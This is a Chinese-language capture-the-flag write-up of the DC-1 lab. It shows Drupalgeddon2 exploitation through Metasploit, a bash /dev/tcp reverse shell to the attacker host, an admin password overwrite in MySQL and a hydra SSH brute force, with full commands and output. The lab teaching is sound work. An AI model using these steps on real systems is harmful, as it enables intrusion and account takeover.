DC-1

0x00.官网描述

DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.

To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

0x01.上nmap

可以发现1为网关，2为宿主机，6为kali，那么3就是我们的受害者

root@JIYE:~/tmp/DC1# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 07:08 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0019s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00027s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.3
Host is up (0.00027s latency).
MAC Address: 00:0C:29:45:E3:65 (VMware)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.08 seconds
root@JIYE:~/tmp/DC1# ls
nmap.sP

0x02.继续nmap扫描服务及端口

可以发现开放了22/80/111/41087端口

root@JIYE:~/tmp/DC1# nmap -A 192.168.1.3 -p 1-65535 -oN nmap.A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 07:19 EDT
Nmap scan report for 192.168.1.3
Host is up (0.00080s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36531/tcp6  status
|   100024  1          41087/tcp   status
|   100024  1          48070/udp6  status
|_  100024  1          50997/udp   status
41087/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:45:E3:65 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.80 ms 192.168.1.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.37 seconds

0x03.由于发现了22与80端口，可以考虑爆破或者访问一下

这里先访问一下

感觉像一个cms，先wiki一下，果然这是一个由PHP写的开源cms😜

0x04.接下来可以对网站进行目录扫描

可以发现robots.txt，此文件用来防爬虫，文件内容一般为不想让人看到的

root@JIYE:~/tmp/DC1# dirb http://192.168.1.3 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Aug 20 07:38:44 2020
URL_BASE: http://192.168.1.3/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.3/ ----
+ http://192.168.1.3/0 (CODE:200|SIZE:7564)                           
+ http://192.168.1.3/admin (CODE:403|SIZE:7652)                       
+ http://192.168.1.3/Admin (CODE:403|SIZE:7497)                       
+ http://192.168.1.3/ADMIN (CODE:403|SIZE:7497)                       
+ http://192.168.1.3/batch (CODE:403|SIZE:7787)                         
+ http://192.168.1.3/cgi-bin/ (CODE:403|SIZE:287)                       
==> DIRECTORY: http://192.168.1.3/includes/                             
+ http://192.168.1.3/index.php (CODE:200|SIZE:7564)                     
+ http://192.168.1.3/install.mysql (CODE:403|SIZE:292)                     
+ http://192.168.1.3/install.pgsql (CODE:403|SIZE:292)                     
+ http://192.168.1.3/LICENSE (CODE:200|SIZE:18092)                     
==> DIRECTORY: http://192.168.1.3/misc/                                 
==> DIRECTORY: http://192.168.1.3/modules/                             
+ http://192.168.1.3/node (CODE:200|SIZE:7564)                         
==> DIRECTORY: http://192.168.1.3/profiles/                               
+ http://192.168.1.3/README (CODE:200|SIZE:5376)                     
+ http://192.168.1.3/robots (CODE:200|SIZE:1561)                       
+ http://192.168.1.3/robots.txt (CODE:200|SIZE:1561)                     
+ http://192.168.1.3/Root (CODE:403|SIZE:283)                           
==> DIRECTORY: http://192.168.1.3/scripts/                               
+ http://192.168.1.3/search (CODE:403|SIZE:7500)                       
+ http://192.168.1.3/Search (CODE:403|SIZE:7500)                       
+ http://192.168.1.3/server-status (CODE:403|SIZE:292)                     
==> DIRECTORY: http://192.168.1.3/sites/                                 
==> DIRECTORY: http://192.168.1.3/themes/                               
+ http://192.168.1.3/user (CODE:200|SIZE:7417)                         
+ http://192.168.1.3/web.config (CODE:200|SIZE:2178)                     
+ http://192.168.1.3/xmlrpc.php (CODE:200|SIZE:42)     
......

访问一下可以发现UPGRADE.txt

访问UPGRADE.txt，可以发现此cms的版本为7.x

百度一下发现存在RCE漏洞

0x05.get shell

1.msf一把梭的我直接msf

root@JIYE:~/tmp/DC1# msfconsole -q
msf5 > search drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   1  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   4  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   5  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   6  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index, for example use 7 or use exploit/unix/webapp/php_xmlrpc_eval

msf5 > 

2.由于是18年的洞所以使用第四个API注入，直接拿到meterpreter shell

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > 
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > info

       Name: Drupal Drupalgeddon 2 Forms API Property Injection
     Module: exploit/unix/webapp/drupal_drupalgeddon2
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2018-03-28

Provided by:
  Jasper Mattsson
  a2u
  Nixawk
  FireFart
  wvu <wvu@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic (PHP In-Memory)
  1   Automatic (PHP Dropper)
  2   Automatic (Unix In-Memory)
  3   Automatic (Linux Dropper)
  4   Drupal 7.x (PHP In-Memory)
  5   Drupal 7.x (PHP Dropper)
  6   Drupal 7.x (Unix In-Memory)
  7   Drupal 7.x (Linux Dropper)
  8   Drupal 8.x (PHP In-Memory)
  9   Drupal 8.x (PHP Dropper)
  10  Drupal 8.x (Unix In-Memory)
  11  Drupal 8.x (Linux Dropper)

Check supported:
  Yes

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  DUMP_OUTPUT  false            no        Dump payload command output
  PHP_FUNC     passthru         yes       PHP function to execute
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT        80               yes       The target port (TCP)
  SSL          false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       Path to Drupal install
  VHOST                         no        HTTP server virtual host

Payload information:
  Avoid: 3 characters

Description:
  This module exploits a Drupal property injection in the Forms API. 
  Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are 
  vulnerable.

References:
  https://cvedetails.com/cve/CVE-2018-7600/
  https://www.drupal.org/sa-core-2018-002
  https://greysec.net/showthread.php?tid=2912
  https://research.checkpoint.com/uncovering-drupalgeddon-2/
  https://github.com/a2u/CVE-2018-7600
  https://github.com/nixawk/labs/issues/19
  https://github.com/FireFart/CVE-2018-7600

Also known as:
  SA-CORE-2018-002
  Drupalgeddon 2

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > options 

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.6      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)


msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.3
rhosts => 192.168.1.3
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.1.6
lhost => 192.168.1.6
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set payload 
set payload generic/custom                      set payload php/bind_php                        set payload php/meterpreter/bind_tcp_uuid
set payload generic/shell_bind_tcp              set payload php/bind_php_ipv6                   set payload php/meterpreter/reverse_tcp
set payload generic/shell_reverse_tcp           set payload php/download_exec                   set payload php/meterpreter/reverse_tcp_uuid
set payload multi/meterpreter/reverse_http      set payload php/exec                            set payload php/meterpreter_reverse_tcp
set payload multi/meterpreter/reverse_https     set payload php/meterpreter/bind_tcp            set payload php/reverse_perl
set payload php/bind_perl                       set payload php/meterpreter/bind_tcp_ipv6       set payload php/reverse_php
set payload php/bind_perl_ipv6                  set payload php/meterpreter/bind_tcp_ipv6_uuid  
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 192.168.1.6:4444 
[*] Sending stage (38288 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.3:52082) at 2020-08-20 08:50:40 -0400

meterpreter > 

3.查看用户权限，并尝试提权，霸特，竟然没有getsystem🙃

meterpreter > getuid 
Server username: www-data (33)
meterpreter > getsystem
[-] Unknown command: getsystem.
meterpreter > 

由于要找到5个flag所以还是先查看一下文件

meterpreter > pwd
/var/www
meterpreter > ls
Listing: /var/www
=================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  174    fil   2013-11-20 15:45:59 -0500  .gitignore
100644/rw-r--r--  5767   fil   2013-11-20 15:45:59 -0500  .htaccess
100644/rw-r--r--  1481   fil   2013-11-20 15:45:59 -0500  COPYRIGHT.txt
100644/rw-r--r--  1451   fil   2013-11-20 15:45:59 -0500  INSTALL.mysql.txt
100644/rw-r--r--  1874   fil   2013-11-20 15:45:59 -0500  INSTALL.pgsql.txt
100644/rw-r--r--  1298   fil   2013-11-20 15:45:59 -0500  INSTALL.sqlite.txt
100644/rw-r--r--  17861  fil   2013-11-20 15:45:59 -0500  INSTALL.txt
100755/rwxr-xr-x  18092  fil   2013-11-01 06:14:15 -0400  LICENSE.txt
100644/rw-r--r--  8191   fil   2013-11-20 15:45:59 -0500  MAINTAINERS.txt
100644/rw-r--r--  5376   fil   2013-11-20 15:45:59 -0500  README.txt
100644/rw-r--r--  9642   fil   2013-11-20 15:45:59 -0500  UPGRADE.txt
100644/rw-r--r--  6604   fil   2013-11-20 15:45:59 -0500  authorize.php
100644/rw-r--r--  720    fil   2013-11-20 15:45:59 -0500  cron.php
100644/rw-r--r--  52     fil   2019-02-19 08:20:46 -0500  flag1.txt
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  includes
100644/rw-r--r--  529    fil   2013-11-20 15:45:59 -0500  index.php
100644/rw-r--r--  703    fil   2013-11-20 15:45:59 -0500  install.php
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  misc
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  modules
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  profiles
100644/rw-r--r--  1561   fil   2013-11-20 15:45:59 -0500  robots.txt
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  scripts
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  sites
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  themes
100644/rw-r--r--  19941  fil   2013-11-20 15:45:59 -0500  update.php
100644/rw-r--r--  2178   fil   2013-11-20 15:45:59 -0500  web.config
100644/rw-r--r--  417    fil   2013-11-20 15:45:59 -0500  xmlrpc.php

meterpreter > 

4.发现flag1.txt，看看有没有权限看

meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.
meterpreter > 

看是能看，霸特下一个flag在哪？？？根据提示，每一个好的cms需要一个配置文件，你也是。。。😥

查看网站配置文件，是一个xml文件，啥也没有！

meterpreter > cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <!-- Don't show directory listings for URLs which map to a directory. -->
    <directoryBrowse enabled="false" />
    <rewrite>
      <rules>
        <rule name="Protect files and directories from prying eyes" stopProcessing="true">
          <match url="\.(engine|inc|info|install|make|module|profile|test|po|sh|.*sql|theme|tpl(\.php)?|xtmpl)$|^(\..*|Entries.*|Repository|Root|Tag|Template)$" />
          <action type="CustomResponse" statusCode="403" subStatusCode="0" statusReason="Forbidden" statusDescription="Access is forbidden." />
        </rule>
        <rule name="Force simple error message for requests for non-existent favicon.ico" stopProcessing="true">
          <match url="favicon\.ico" />
          <action type="CustomResponse" statusCode="404" subStatusCode="1" statusReason="File Not Found" statusDescription="The requested file favicon.ico was not found" />
          <conditions>
            <add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" />
          </conditions>
        </rule>
        <!-- Rewrite URLs of the form 'x' to the form 'index.php?q=x'. -->
        <rule name="Short URLs" stopProcessing="true">
          <match url="^(.*)$" ignoreCase="false" />
          <conditions>
            <add input="{REQUEST_FILENAME}" matchType="IsFile" ignoreCase="false" negate="true" />
            <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" />
            <add input="{URL}" pattern="^/favicon.ico$" ignoreCase="false" negate="true" />
          </conditions>
          <action type="Rewrite" url="index.php?q={R:1}" appendQueryString="true" />
        </rule>
      </rules>
    </rewrite>

    <httpErrors>
      <remove statusCode="404" subStatusCode="-1" />
      <error statusCode="404" prefixLanguageFilePath="" path="/index.php" responseMode="ExecuteURL" />
    </httpErrors>

    <defaultDocument>
      <!-- Set the default document -->
      <files>
        <remove value="index.php" />
        <add value="index.php" />
      </files>
    </defaultDocument>
  </system.webServer>
</configuration>

meterpreter > 

换个思路，竟然是web application那就有数据库，那么数据库的密码是以明文的方式写在配置文件中

一番苦逼的查找，他在sites/default/settings.php中

并且也看到了flag2与提示信息，内容为：暴力破解与目录攻击不是你访问系统的唯一途径，但是你可以尝试一下

meterpreter > cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

0x06.登入数据库

由于meterpreter不能进行mysql登入，所以进入到常规shell下，发现3306是开放的，并且只允许本地连接

meterpreter > shell
Process 3903 created.
Channel 7 created.
netstat -apntu
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:41087           0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
tcp        0      0 192.168.1.3:52082       192.168.1.6:4444        ESTABLISHED 3837/php        
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 ::1:25                  :::*                    LISTEN      -               
tcp6       0      0 :::111                  :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::36531                :::*                    LISTEN      -               
tcp6       1      0 192.168.1.3:80          192.168.1.6:40931       CLOSE_WAIT  -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
udp        0      0 0.0.0.0:49260           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -               
udp        0      0 0.0.0.0:783             0.0.0.0:*                           -               
udp        0      0 127.0.0.1:815           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:50997           0.0.0.0:*                           -               
udp6       0      0 :::48070                :::*                                -               
udp6       0      0 :::111                  :::*                                -   
udp6       0      0 :::62200                :::*                                -               
udp6       0      0 :::783                  :::*                                -         

尝试登入，发现在当前shell下是无法登入的

mysql -udbuser -pR0ck3t

由于这个shell是http方式建立的，不是持久连接，所以下面建立持久连接

0x07.反弹shell

由于需要建立持久连接，所以尝试将DC1的shell反弹给kali

1.kali先监听6666端口

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...

2.DC1执行

bash -i >& /dev/tcp/192.168.1.6/6666 0>&1

咦，报错了😱换个方法

meterpreter > shell
Process 3911 created.
Channel 8 created.
bash -i >& /dev/tcp/192.168.1.6/6666 0>&1
/bin/sh: 2: Syntax error: Bad fd numbermeterpreter > 
meterpreter > 

/bin/bash -i >& /dev/tcp/192.168.1.6/6666 0>&1

也不行，我giao

meterpreter > shell
Process 3915 created.
Channel 10 created.
/bin/bash -i >& /dev/tcp/192.168.1.6/6666 0>&1                                                                                                      
meterpreter > 

再换个方法，此方法为使用python脚本先建立交互shell再反弹shell给kali

python -c 'import pty;pty.spawn("/bin/bash")'

这回成功了，成功建立交互式shell

meterpreter > shell
Process 3924 created.
Channel 12 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ /bin/bash -i >& /dev/tcp/192.168.1.6/6666 0>&1

3.反弹

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.3] 51322
www-data@DC-1:/var/www$ 

反弹成功再次登入mysql

0x08.再次登入mysql

然而在反弹给kali的shell不能登陆到mysql（我giao，这是什么原理？？？？？？）

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.3] 51322
www-data@DC-1:/var/www$ mysql -udbuser -pR0ck3t
mysql -udbuser -pR0ck3t

但是在使用python脚本获得的交互式shell下却可以登入，菜狗一脸问号❓❓❓❓❓❓❓❓❓（我竟然饶了一圈。。。）

meterpreter > shell
Process 3960 created.
Channel 16 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ mysql -udbuser -pR0ck3t
mysql -udbuser -pR0ck3t
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 16035
Server version: 5.5.60-0+deb7u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

1.查看数据库

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)

mysql> 

2.使用drupaldb，查看表

mysql> use drupaldb     
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;    
show tables;
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)

mysql> 

80张表太过分了！可以看到users表

3.查看users表

mysql> select * from users\G  //\G表示将表旋转90°
select * from users\G
*************************** 1. row ***************************
             uid: 0
            name: 
            pass: 
            mail: 
           theme: 
       signature: 
signature_format: NULL
         created: 0
          access: 0
           login: 0
          status: 0
        timezone: NULL
        language: 
         picture: 0
            init: 
            data: NULL
*************************** 2. row ***************************
             uid: 1
            name: admin
            pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
            mail: admin@example.com
           theme: 
       signature: 
signature_format: NULL
         created: 1550581826
          access: 1550583852
           login: 1550582362
          status: 1
        timezone: Australia/Melbourne
        language: 
         picture: 0
            init: admin@example.com
            data: b:0;
*************************** 3. row ***************************
             uid: 2
            name: Fred
            pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
            mail: fred@example.org
           theme: 
       signature: 
signature_format: filtered_html
         created: 1550581952
          access: 1550582225
           login: 1550582225
          status: 1
        timezone: Australia/Melbourne
        language: 
         picture: 0
            init: fred@example.org
            data: b:0;
3 rows in set (0.00 sec)

mysql> 

可以看到cms的管理用户加密密码，前面flag2提示了，暴力破解不是唯一方法，那么就换一个思路

4.修改覆盖admin密码

用一个新的密码密文将原来的密码覆盖掉，手动生成

使用PHP调用scripts/password-hash.sh生成admin的密文

www-data@DC-1:/var/www$ php scripts/password-hash.sh admin      
php scripts/password-hash.sh admin

password: admin                 hash: $S$D4KjoV1PUSBjXtqmjsUaVuRE4TrPc8iY2F.KYKPn.qzT7vbfsg27

www-data@DC-1:/var/www$ 

覆盖

update users set pass="$S$D4KjoV1PUSBjXtqmjsUaVuRE4TrPc8iY2F.KYKPn.qzT7vbfsg27" where uid=1;

mysql> use drupaldb;
use drupaldb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> update users set pass="$S$D4KjoV1PUSBjXtqmjsUaVuRE4TrPc8iY2F.KYKPn.qzT7vbfsg27" where uid=1;
<s="$S$D4KjoV1PUSBjXtqmjsUaVuRE4TrPc8iY2F.KYKPn.qzT7vbfsg27" where uid=1;    
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0

mysql>

0x09.登入cms

admin/admin登入

成功登入

点击仪表盘发现flag3

点击flag3

发现线索在passwd中，查看passwd

www-data@DC-1:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
www-data@DC-1:/var/www$ 

结尾发现flag4，并且为/bin/bash，是可以登入的，前文已经发现开启了22端口

接下来进行爆破

root@JIYE:~/tmp/DC1#hydra -l flag4 -P /usr/share/john/password.lst 192.168.1.6 ssh -vV -f -o hydra.ssh
......    //-l用户名，-P字典，-vV为爆破详细信息，-f为如果遇到正确的密码则停止爆破，-o输出文件
......
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "delta" - 137 of 3562 [child 2] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "doctor" - 138 of 3562 [child 8] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "fisher" - 139 of 3562 [child 10] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "island" - 140 of 3562 [child 9] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "john" - 141 of 3562 [child 15] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "joshua" - 142 of 3562 [child 0] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "karen" - 143 of 3562 [child 7] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "marley" - 144 of 3562 [child 1] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "orange" - 145 of 3562 [child 12] (0/3)
[22][ssh] host: 192.168.1.3   login: flag4   password: orange
[STATUS] attack finished for 192.168.1.3 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-20 11:58:01
root@JIYE:~/tmp/DC1#

破解出密码为orange

登入

root@JIYE:~/tmp/DC1# ssh flag4@192.168.1.3
The authenticity of host '192.168.1.3 (192.168.1.3)' can't be established.
ECDSA key fingerprint is SHA256:89B+YqcNl4cSf/BZk26MQG1QeW4BvBlVENMbTRhVhsU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.1.3' (ECDSA) to the list of known hosts.
flag4@192.168.1.3's password: 
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$

查看文件，得到flag4

flag4@DC-1:~$ ls
flag4.txt
flag4@DC-1:~$ 
flag4@DC-1:~$ 
